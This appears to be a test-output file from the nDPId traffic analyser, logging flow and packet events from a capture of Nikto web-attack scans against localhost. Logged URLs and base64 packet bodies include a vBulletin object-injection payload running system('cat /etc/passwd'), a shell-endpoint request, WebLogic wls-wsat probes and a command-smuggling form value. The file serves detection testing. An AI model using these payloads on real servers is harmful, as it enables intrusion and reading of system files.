+01391{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vb\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":651,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":651,"pkt_l4_len":617,"thread_ts_msec":1576420277998,"pkt":"AAAAAAAAAAAAAAAACABFAAJ9M09AAEAGByp\/AAABfwAAAcfwH5BMhgoXl7elMYAYAEAAcgAAAQEICp1nABadZwAWR0VUIC92YnVsbGV0aW4vYWpheC9hcGkvaG9vay9kZWNvZGVBcmd1bWVudHM\/YXJndW1lbnRzPU8lM0ExMiUzQSUyMnZCX2RCX1Jlc3VsdCUyMiUzQTIlM0ElN0JzJTNBNSUzQSUyMiUwMCUyQSUwMGRiJTIyJTNCTyUzQTE3JTNBJTIydkJfRGF0YWJhc2VfTXlTUUwlMjIlM0ExJTNBJTdCcyUzQTklM0ElMjJmdW5jdGlvbnMlMjIlM0JhJTNBMSUzQSU3QnMlM0ExMSUzQSUyMmZyZWVfcmVzdWx0JTIyJTNCcyUzQTYlM0ElMjJhc3NlcnQlMjIlM0IlN0QlN0RzJTNBMTIlM0ElMjIlMDAlMkElMDByZWNvcmRzZXQlMjIlM0JzJTNBMjUlM0ElMjJzeXN0ZW0lMjglMjdjYXQlMjAlMkZldGMlMkZwYXNzd2QlMjclMjklMjIlM0IlN0QgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwNTgpDQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} +01398{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7560000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7560000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} 
+01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7560000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7560000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} 
+01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7560000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} 
+01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7560000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7560000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": 